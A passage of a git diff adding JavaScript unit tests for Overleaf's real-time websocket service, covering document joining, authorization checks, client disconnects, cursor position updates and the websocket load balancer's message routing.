this.callback.args[0][4] + const encodedComment = encodedComments.comments.pop() + const encodedCommentText = encodedComment.op.c + return encodedCommentText.should.equal('räksmörgÃ¥s') + }) + }) + + describe('with changes that need encoding', function () { + it('should call the callback with the encoded insert change', function () { + this.ranges.changes = [{ op: { i: 'räksmörgås' } }] + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + { encodeRanges: true }, + this.callback + ) + + const encodedChanges = this.callback.args[0][4] + const encodedChange = encodedChanges.changes.pop() + const encodedChangeText = encodedChange.op.i + return encodedChangeText.should.equal('räksmörgÃ¥s') + }) + + return it('should call the callback with the encoded delete change', function () { + this.ranges.changes = [{ op: { d: 'räksmörgås' } }] + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + { encodeRanges: true }, + this.callback + ) + + const encodedChanges = this.callback.args[0][4] + const encodedChange = encodedChanges.changes.pop() + const encodedChangeText = encodedChange.op.d + return encodedChangeText.should.equal('räksmörgÃ¥s') + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, (this.err = new Error('not authorized'))) + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with an error', function () { + return this.callback + .calledWith(sinon.match({ message: 'not authorized' })) + .should.equal(true) + }) + + return it('should not call the DocumentUpdaterManager', function () { + return this.DocumentUpdaterManager.getDocument.called.should.equal( + false + ) + }) + }) + + describe('with a restricted client', function () { + beforeEach(function () { + this.ranges.comments = [{ op: { a: 1 } }, { op: { a: 2 } }] + this.client.ol_context.is_restricted_user = true + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + return it('should overwrite ranges.comments with an empty list', function () { + const ranges = this.callback.args[0][4] + return expect(ranges.comments).to.deep.equal([]) + }) + }) + + describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'immediately', + }) + ).to.equal(true) + }) + + return it('should not get the document', function () { + return expect(this.DocumentUpdaterManager.getDocument.called).to.equal( + false + ) + }) + }) + + describe('when the client disconnects while auth checks are running', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.client.disconnected = true + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + done() + } + ) + }) + + it('should call the callback with no details', function () { + expect(this.callback.called).to.equal(true) + expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-client-auth-check', + }) + ).to.equal(true) + }) + + it('should not get the document', function () { + expect(this.DocumentUpdaterManager.getDocument.called).to.equal(false) + }) + }) + + describe('when the client starts a parallel joinDoc request', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.DocumentUpdaterManager.checkDocument = sinon.stub().yields() + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + {}, + () => {} + ) + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + // make sure the other joinDoc request completed + setTimeout(done, 5) + } + ) + }) + + it('should call the callback with an error', function () { + expect(this.callback.called).to.equal(true) + expect(this.callback.args[0][0].message).to.equal( + 'joinLeaveEpoch mismatch' + ) + }) + + it('should get the document once (the parallel request wins)', function () { + expect(this.DocumentUpdaterManager.getDocument.callCount).to.equal(1) + }) + }) + + describe('when the client starts a parallel leaveDoc request', function () { + beforeEach(function (done) { + this.RoomManager.leaveDoc = sinon.stub() + + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error() + ) + this.DocumentUpdaterManager.checkDocument = (projectId, docId, cb) => { + this.WebsocketController.leaveDoc(this.client, this.doc_id, () => {}) + cb() + } + + this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + (...args) => { + this.callback(...args) + done() + } + ) + }) + + it('should call the callback with an error', function () { + expect(this.callback.called).to.equal(true) + expect(this.callback.args[0][0].message).to.equal( + 'joinLeaveEpoch mismatch' + ) + }) + + it('should not get the document', function () { + expect(this.DocumentUpdaterManager.getDocument.called).to.equal(false) + }) + }) + + describe('when the client disconnects while RoomManager.joinDoc is running', function () { + beforeEach(function () { + this.RoomManager.joinDoc = (client, docId, cb) => { + this.client.disconnected = true + return cb() + } + + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-joining-room', + }) + ).to.equal(true) + }) + + return it('should not get the document', function () { + return expect(this.DocumentUpdaterManager.getDocument.called).to.equal( + false + ) + }) + }) + + return describe('when the client disconnects while DocumentUpdaterManager.getDocument is running', function () { + beforeEach(function () { + this.DocumentUpdaterManager.getDocument = ( + projectId, + docId, + fromVersion, + callback + ) => { + this.client.disconnected = true + return callback( + null, + this.doc_lines, + this.version, + this.ranges, + this.ops + ) + } + + return this.WebsocketController.joinDoc( + this.client, + this.doc_id, + -1, + this.options, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should increment the editor.join-doc.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.join-doc.disconnected', 1, { + status: 'after-doc-updater-call', + }) + ).to.equal(true) + }) + }) + }) + + describe('leaveDoc', function () { + beforeEach(function () { + this.doc_id = 'doc-id-123' + this.client.ol_context.project_id = this.project_id + this.RoomManager.leaveDoc = sinon.stub() + return this.WebsocketController.leaveDoc( + this.client, + this.doc_id, + this.callback + ) + }) + + it('should inc the joinLeaveEpoch', function () { + expect(this.client.joinLeaveEpoch).to.equal(1) + }) + + it('should remove the client from the doc_id room', function () { + return this.RoomManager.leaveDoc + .calledWith(this.client, this.doc_id) + .should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should increment the leave-doc metric', function () { + return this.metrics.inc.calledWith('editor.leave-doc').should.equal(true) + }) + }) + + describe('getConnectedUsers', function () { + beforeEach(function () { + this.client.ol_context.project_id = this.project_id + this.users = ['mock', 'users'] + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + return (this.ConnectedUsersManager.getConnectedUsers = sinon + .stub() + .callsArgWith(1, null, this.users)) + }) + + describe('when authorized', function () { + beforeEach(function (done) { + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, null) + return this.WebsocketController.getConnectedUsers( + this.client, + (...args) => { + this.callback(...Array.from(args || [])) + return done() + } + ) + }) + + it('should check that the client is authorized to view the project', function () { + return this.AuthorizationManager.assertClientCanViewProject + .calledWith(this.client) + .should.equal(true) + }) + + it('should broadcast a request to update the client list', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith(this.project_id, 'clientTracking.refresh') + .should.equal(true) + }) + + it('should get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers + .calledWith(this.project_id) + .should.equal(true) + }) + + it('should return the users', function () { + return this.callback.calledWith(null, this.users).should.equal(true) + }) + + return it('should increment the get-connected-users metric', function () { + return this.metrics.inc + .calledWith('editor.get-connected-users') + .should.equal(true) + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, (this.err = new Error('not authorized'))) + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should not get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers.called.should.equal( + false + ) + }) + + return it('should return an error', function () { + return this.callback.calledWith(this.err).should.equal(true) + }) + }) + + describe('when restricted user', function () { + beforeEach(function () { + this.client.ol_context.is_restricted_user = true + this.AuthorizationManager.assertClientCanViewProject = sinon + .stub() + .callsArgWith(1, null) + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should return an empty array of users', function () { + return this.callback.calledWith(null, []).should.equal(true) + }) + + return it('should not get the connected users for the project', function () { + return this.ConnectedUsersManager.getConnectedUsers.called.should.equal( + false + ) + }) + }) + + return describe('when the client has disconnected', function () { + beforeEach(function () { + this.client.disconnected = true + this.AuthorizationManager.assertClientCanViewProject = sinon.stub() + return this.WebsocketController.getConnectedUsers( + this.client, + this.callback + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should not check permissions', function () { + return expect( + this.AuthorizationManager.assertClientCanViewProject.called + ).to.equal(false) + }) + }) + }) + + describe('updateClientPosition', function () { + beforeEach(function () { + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + this.ConnectedUsersManager.updateUserPosition = sinon + .stub() + .callsArgAsync(4) + this.AuthorizationManager.assertClientCanViewProjectAndDoc = sinon + .stub() + .callsArgWith(2, null) + return (this.update = { + doc_id: (this.doc_id = 'doc-id-123'), + row: (this.row = 42), + column: (this.column = 37), + }) + }) + + describe('with a logged in user', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: (this.first_name = 'Douglas'), + last_name: (this.last_name = 'Adams'), + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.first_name} ${this.last_name}`, + row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition + .calledWith( + this.project_id, + this.client.publicId, + { + _id: this.user_id, + email: this.email, + first_name: this.first_name, + last_name: this.last_name, + }, + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + } + ) + .should.equal(true) + return done() + }) + + return it('should increment the update-client-position metric at 0.1 frequency', function () { + return this.metrics.inc + .calledWith('editor.update-client-position', 0.1) + .should.equal(true) + }) + }) + + describe('with a logged in user who has no last_name set', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: (this.first_name = 'Douglas'), + last_name: undefined, + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.first_name}`, + row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition + .calledWith( + this.project_id, + this.client.publicId, + { + _id: this.user_id, + email: this.email, + first_name: this.first_name, + last_name: undefined, + }, + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + } + ) + .should.equal(true) + return done() + }) + + return it('should increment the update-client-position metric at 0.1 frequency', function () { + return this.metrics.inc + .calledWith('editor.update-client-position', 0.1) + .should.equal(true) + }) + }) + + describe('with a logged in user who has no first_name set', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: undefined, + last_name: (this.last_name = 'Adams'), + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + + this.populatedCursorData = { + doc_id: this.doc_id, + id: this.client.publicId, + name: `${this.last_name}`, + row: this.row, + column: this.column, + email: this.email, + user_id: this.user_id, + } + this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it("should send the update to the project room with the user's name", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith( + this.project_id, + 'clientTracking.clientUpdated', + this.populatedCursorData + ) + .should.equal(true) + }) + + it('should send the cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition + .calledWith( + this.project_id, + this.client.publicId, + { + _id: this.user_id, + email: this.email, + first_name: undefined, + last_name: this.last_name, + }, + { + row: this.row, + column: this.column, + doc_id: this.doc_id, + } + ) + .should.equal(true) + return done() + }) + + return it('should increment the update-client-position metric at 0.1 frequency', function () { + return this.metrics.inc + .calledWith('editor.update-client-position', 0.1) + .should.equal(true) + }) + }) + describe('with a logged in user who has no names set', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + first_name: undefined, + last_name: undefined, + email: (this.email = 'joe@example.com'), + user_id: (this.user_id = 'user-id-123'), + } + return this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + return it('should send the update to the project name with no name', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith(this.project_id, 'clientTracking.clientUpdated', { + doc_id: this.doc_id, + id: this.client.publicId, + user_id: this.user_id, + name: '', + row: this.row, + column: this.column, + email: this.email, + }) + .should.equal(true) + }) + }) + + describe('with an anonymous user', function () { + beforeEach(function (done) { + this.client.ol_context = { + project_id: this.project_id, + } + return this.WebsocketController.updateClientPosition( + this.client, + this.update, + done + ) + }) + + it('should send the update to the project room with no name', function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith(this.project_id, 'clientTracking.clientUpdated', { + doc_id: this.doc_id, + id: this.client.publicId, + name: '', + row: this.row, + column: this.column, + }) + .should.equal(true) + }) + + return it('should not send cursor data to the connected user manager', function (done) { + this.ConnectedUsersManager.updateUserPosition.called.should.equal(false) + return done() + }) + }) + + return describe('when the client has disconnected', function () { + beforeEach(function (done) { + this.client.disconnected = true + this.AuthorizationManager.assertClientCanViewProjectAndDoc = + sinon.stub() + return this.WebsocketController.updateClientPosition( + this.client, + this.update, + (...args) => { + this.callback(...args) + done(args[0]) + } + ) + }) + + it('should call the callback with no details', function () { + return expect(this.callback.args[0]).to.deep.equal([]) + }) + + return it('should not check permissions', function () { + return expect( + this.AuthorizationManager.assertClientCanViewProjectAndDoc.called + ).to.equal(false) + }) + }) + }) + + describe('applyOtUpdate', function () { + beforeEach(function () { + this.update = { op: { p: 12, t: 'foo' } } + this.client.ol_context.user_id = this.user_id + this.client.ol_context.project_id = this.project_id + this.WebsocketController._assertClientCanApplyUpdate = sinon + .stub() + .yields() + return (this.DocumentUpdaterManager.queueChange = sinon + .stub() + .callsArg(3)) + }) + + describe('succesfully', function () { + beforeEach(function () { + return this.WebsocketController.applyOtUpdate( + this.client, + this.doc_id, + this.update, + this.callback + ) + }) + + it('should set the source of the update to the client id', function () { + return this.update.meta.source.should.equal(this.client.publicId) + }) + + it('should set the user_id of the update to the user id', function () { + return this.update.meta.user_id.should.equal(this.user_id) + }) + + it('should queue the update', function () { + return this.DocumentUpdaterManager.queueChange + .calledWith(this.project_id, this.doc_id, this.update) + .should.equal(true) + }) + + it('should call the callback', function () { + return this.callback.called.should.equal(true) + }) + + return it('should increment the doc updates', function () { + return this.metrics.inc + .calledWith('editor.doc-update') + .should.equal(true) + }) + }) + + describe('unsuccessfully', function () { + beforeEach(function () { + this.client.disconnect = sinon.stub() + this.DocumentUpdaterManager.queueChange = sinon + .stub() + .callsArgWith(3, (this.error = new Error('Something went wrong'))) + return this.WebsocketController.applyOtUpdate( + this.client, + this.doc_id, + this.update, + this.callback + ) + }) + + it('should disconnect the client', function () { + return this.client.disconnect.called.should.equal(true) + }) + + it('should not log an error', function () { + return this.logger.error.called.should.equal(false) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + describe('when not authorized', function () { + beforeEach(function () { + this.client.disconnect = sinon.stub() + this.WebsocketController._assertClientCanApplyUpdate = sinon + .stub() + .yields((this.error = new Error('not authorized'))) + return this.WebsocketController.applyOtUpdate( + this.client, + this.doc_id, + this.update, + this.callback + ) + }) + + // This happens in a setTimeout to allow the client a chance to receive the error first. + // I'm not sure how to unit test, but it is acceptance tested. + // it "should disconnect the client", -> + // @client.disconnect.called.should.equal true + + it('should not log a warning', function () { + return this.logger.warn.called.should.equal(false) + }) + + return it('should call the callback with the error', function () { + return this.callback.calledWith(this.error).should.equal(true) + }) + }) + + return describe('update_too_large', function () { + beforeEach(function (done) { + this.client.disconnect = sinon.stub() + this.client.emit = sinon.stub() + this.client.ol_context.user_id = this.user_id + this.client.ol_context.project_id = this.project_id + const error = new UpdateTooLargeError(7372835) + this.DocumentUpdaterManager.queueChange = sinon + .stub() + .callsArgWith(3, error) + this.WebsocketController.applyOtUpdate( + this.client, + this.doc_id, + this.update, + this.callback + ) + return setTimeout(() => done(), 1) + }) + + it('should call the callback with no error', function () { + this.callback.called.should.equal(true) + return this.callback.args[0].should.deep.equal([]) + }) + + it('should log a warning with the size and context', function () { + this.logger.warn.called.should.equal(true) + return this.logger.warn.args[0].should.deep.equal([ + { + userId: this.user_id, + projectId: this.project_id, + docId: this.doc_id, + updateSize: 7372835, + }, + 'update is too large', + ]) + }) + + describe('after 100ms', function () { + beforeEach(function (done) { + return setTimeout(done, 100) + }) + + it('should send an otUpdateError the client', function () { + return this.client.emit.calledWith('otUpdateError').should.equal(true) + }) + + return it('should disconnect the client', function () { + return this.client.disconnect.called.should.equal(true) + }) + }) + + return describe('when the client disconnects during the next 100ms', function () { + beforeEach(function (done) { + this.client.disconnected = true + return setTimeout(done, 100) + }) + + it('should not send an otUpdateError the client', function () { + return this.client.emit + .calledWith('otUpdateError') + .should.equal(false) + }) + + it('should not disconnect the client', function () { + return this.client.disconnect.called.should.equal(false) + }) + + return it('should increment the editor.doc-update.disconnected metric with a status', function () { + return expect( + this.metrics.inc.calledWith('editor.doc-update.disconnected', 1, { + status: 'at-otUpdateError', + }) + ).to.equal(true) + }) + }) + }) + }) + + return describe('_assertClientCanApplyUpdate', function () { + beforeEach(function () { + this.edit_update = { + op: [ + { i: 'foo', p: 42 }, + { c: 'bar', p: 132 }, + ], + } // comments may still be in an edit op + this.comment_update = { op: [{ c: 'bar', p: 132 }] } + this.AuthorizationManager.assertClientCanEditProjectAndDoc = sinon.stub() + this.AuthorizationManager.assertClientCanReviewProjectAndDoc = + sinon.stub() + return (this.AuthorizationManager.assertClientCanViewProjectAndDoc = + sinon.stub()) + }) + + describe('with a read-write client', function () { + return it('should return successfully', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields(null) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.edit_update, + error => { + expect(error).to.be.null + return done() + } + ) + }) + }) + + describe('with a read-only client and an edit op', function () { + return it('should return an error', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.edit_update, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + + describe('with a read-only client and a comment op', function () { + return it('should return successfully', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.comment_update, + error => { + expect(error).to.be.null + return done() + } + ) + }) + }) + + describe('with a totally unauthorized client', function () { + return it('should return an error', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields( + new Error('not authorized') + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + this.comment_update, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + + describe('with a review client', function () { + it('op with tc should succeed', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + this.AuthorizationManager.assertClientCanReviewProjectAndDoc.yields( + null + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + { op: [{ p: 10, i: 'a' }], meta: { tc: '123456' } }, + error => { + expect(error).to.be.null + return done() + } + ) + }) + + return it('op without tc should fail', function (done) { + this.AuthorizationManager.assertClientCanEditProjectAndDoc.yields( + new Error('not authorized') + ) + this.AuthorizationManager.assertClientCanViewProjectAndDoc.yields(null) + this.AuthorizationManager.assertClientCanReviewProjectAndDoc.yields( + null + ) + return this.WebsocketController._assertClientCanApplyUpdate( + this.client, + this.doc_id, + { op: [{ p: 10, i: 'a' }] }, + error => { + expect(error.message).to.equal('not authorized') + return done() + } + ) + }) + }) + }) +}) diff --git a/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js b/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js new file mode 100644 index 0000000..574ab65 --- /dev/null +++ b/services/real-time/test/unit/js/WebsocketLoadBalancerTests.js @@ -0,0 +1,514 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const SandboxedModule = require('sandboxed-module') +const sinon = require('sinon') +const expect = require('chai').expect +const modulePath = require('node:path').join( + __dirname, + '../../../app/js/WebsocketLoadBalancer' +) + +describe('WebsocketLoadBalancer', function () { + beforeEach(function () { + this.rclient = {} + this.RoomEvents = { on: sinon.stub() } + this.WebsocketLoadBalancer = SandboxedModule.require(modulePath, { + requires: { + '@overleaf/settings': (this.Settings = { redis: {} }), + './RedisClientManager': { + createClientList: () => [], + }, + './SafeJsonParse': (this.SafeJsonParse = { + parse: (data, cb) => cb(null, JSON.parse(data)), + }), + './EventLogger': { checkEventOrder: sinon.stub() }, + './HealthCheckManager': { check: sinon.stub() }, + './RoomManager': (this.RoomManager = { + eventSource: sinon.stub().returns(this.RoomEvents), + }), + './ChannelManager': (this.ChannelManager = { publish: sinon.stub() }), + './ConnectedUsersManager': (this.ConnectedUsersManager = { + refreshClient: sinon.stub(), + }), + }, + }) + this.io = {} + this.WebsocketLoadBalancer.rclientPubList = [{ publish: sinon.stub() }] + this.WebsocketLoadBalancer.rclientSubList = [ + { + subscribe: sinon.stub(), + on: sinon.stub(), + }, + ] + + this.room_id = 'room-id' + this.message = 'otUpdateApplied' + return (this.payload = ['argument one', 42]) + }) + + describe('shouldDisconnectClient', function () { + it('should return false for general messages', function () { + const client = { + ol_context: { user_id: 'abcd' }, + } + const message = { + message: 'someNiceMessage', + payload: [{ data: 'whatever' }], + } + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + + describe('collaborator access level changed', function () { + const messageName = 'project:collaboratorAccessLevel:changed' + const client = { + ol_context: { user_id: 'abcd' }, + } + it('should return true if the user id matches', function () { + const message = { + message: messageName, + payload: [ + { + userId: 'abcd', + }, + ], + } + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(true) + }) + it('should return false if the user id does not match', function () { + const message = { + message: messageName, + payload: [ + { + userId: 'xyz', + }, + ], + } + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + }) + + describe('user removed from project', function () { + const messageName = 'userRemovedFromProject' + const client = { + ol_context: { user_id: 'abcd' }, + } + it('should return false, when the user_id does not match', function () { + const message = { + message: messageName, + payload: ['xyz'], + } + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + + it('should return true, if the user_id matches', function () { + const message = { + message: messageName, + payload: [`${client.ol_context.user_id}`], + } + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(true) + }) + }) + + describe('link-sharing turned off', function () { + const messageName = 'project:publicAccessLevel:changed' + + describe('when the new access level is set to "private"', function () { + const message = { + message: messageName, + payload: [{ newAccessLevel: 'private' }], + } + describe('when the user is an invited member', function () { + const client = { + ol_context: { + is_invited_member: true, + }, + } + + it('should return false', function () { + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + }) + + describe('when the user not an invited member', function () { + const client = { + ol_context: { + is_invited_member: false, + }, + } + + it('should return true', function () { + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(true) + }) + }) + }) + + describe('when the new access level is "tokenBased"', function () { + const message = { + message: messageName, + payload: [{ newAccessLevel: 'tokenBased' }], + } + + describe('when the user is an invited member', function () { + const client = { + ol_context: { + is_invited_member: true, + }, + } + + it('should return false', function () { + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + }) + + describe('when the user not an invited member', function () { + const client = { + ol_context: { + is_invited_member: false, + }, + } + + it('should return false', function () { + expect( + this.WebsocketLoadBalancer.shouldDisconnectClient(client, message) + ).to.equal(false) + }) + }) + }) + }) + }) + + describe('emitToRoom', function () { + beforeEach(function () { + return this.WebsocketLoadBalancer.emitToRoom( + this.room_id, + this.message, + ...Array.from(this.payload) + ) + }) + + return it('should publish the message to redis', function () { + return this.ChannelManager.publish + .calledWith( + this.WebsocketLoadBalancer.rclientPubList[0], + 'editor-events', + this.room_id, + JSON.stringify({ + room_id: this.room_id, + message: this.message, + payload: this.payload, + }) + ) + .should.equal(true) + }) + }) + + describe('emitToAll', function () { + beforeEach(function () { + this.WebsocketLoadBalancer.emitToRoom = sinon.stub() + return this.WebsocketLoadBalancer.emitToAll( + this.message, + ...Array.from(this.payload) + ) + }) + + return it("should emit to the room 'all'", function () { + return this.WebsocketLoadBalancer.emitToRoom + .calledWith('all', this.message, ...Array.from(this.payload)) + .should.equal(true) + }) + }) + + describe('listenForEditorEvents', function () { + beforeEach(function () { + this.WebsocketLoadBalancer._processEditorEvent = sinon.stub() + return this.WebsocketLoadBalancer.listenForEditorEvents() + }) + + it('should subscribe to the editor-events channel', function () { + return this.WebsocketLoadBalancer.rclientSubList[0].subscribe + .calledWith('editor-events') + .should.equal(true) + }) + + return it('should process the events with _processEditorEvent', function () { + return this.WebsocketLoadBalancer.rclientSubList[0].on + .calledWith('message', sinon.match.func) + .should.equal(true) + }) + }) + + return describe('_processEditorEvent', function () { + describe('with bad JSON', function () { + beforeEach(function () { + this.isRestrictedUser = false + this.SafeJsonParse.parse = sinon + .stub() + .callsArgWith(1, new Error('oops')) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + 'blah' + ) + }) + + return it('should log an error', function () { + return this.logger.error.called.should.equal(true) + }) + }) + + describe('with a designated room', function () { + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // duplicate client + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + return this.emit3.called.should.equal(false) + }) + }) // duplicate client should be ignored + + describe('with a designated room, and restricted clients, not restricted message', function () { + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // duplicate client + { + id: 'client-id-4', + emit: (this.emit4 = sinon.stub()), + ol_context: { is_restricted_user: true }, + }, + ]), + } + const data = JSON.stringify({ + room_id: this.room_id, + message: this.message, + payload: this.payload, + }) + return this.WebsocketLoadBalancer._processEditorEvent( + this.io, + 'editor-events', + data + ) + }) + + return it('should send the message to all (unique) clients in the room', function () { + this.io.sockets.clients.calledWith(this.room_id).should.equal(true) + this.emit1 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit2 + .calledWith(this.message, ...Array.from(this.payload)) + .should.equal(true) + this.emit3.called.should.equal(false) // duplicate client should be ignored + return this.emit4.called.should.equal(true) + }) + }) // restricted client, but should be called + + describe('with a designated room, and restricted clients, restricted message', function () { + beforeEach(function () { + this.io.sockets = { + clients: sinon.stub().returns([ + { + id: 'client-id-1', + emit: (this.emit1 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-2', + emit: (this.emit2 = sinon.stub()), + ol_context: {}, + }, + { + id: 'client-id-1', + emit: (this.emit3 = sinon.stub()), + ol_context: {}, + }, // 